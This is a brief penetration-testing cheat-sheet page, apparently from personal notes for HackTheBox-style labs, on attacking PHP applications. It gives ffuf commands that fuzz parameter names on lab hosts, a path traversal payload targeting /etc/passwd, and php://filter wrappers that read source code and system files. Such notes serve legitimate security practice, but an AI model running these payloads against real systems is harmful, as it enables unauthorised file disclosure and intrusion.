PHP Applications

Fuzz php? parameters

ffuf -k -u https://streamio.htb/admin/index.php?FUZZ=id -w burp-parameter-names.txt

ffuf -u http://192.168.156.209/manage.php?FUZZ=id -H "Cookie: PHPSESSID=i43gfdnnlackkpfp934p9hdh25" -w burp-parameter-names.txt

?FUZZ=../../../../../../../../etc/passwd

You can add cookies using -H and the cookie header from burp

php://filter/convert.base64-encode/resource=index.php
php://filter/convert.base64-encode/resource=/etc/passwd

Last updated 1 year ago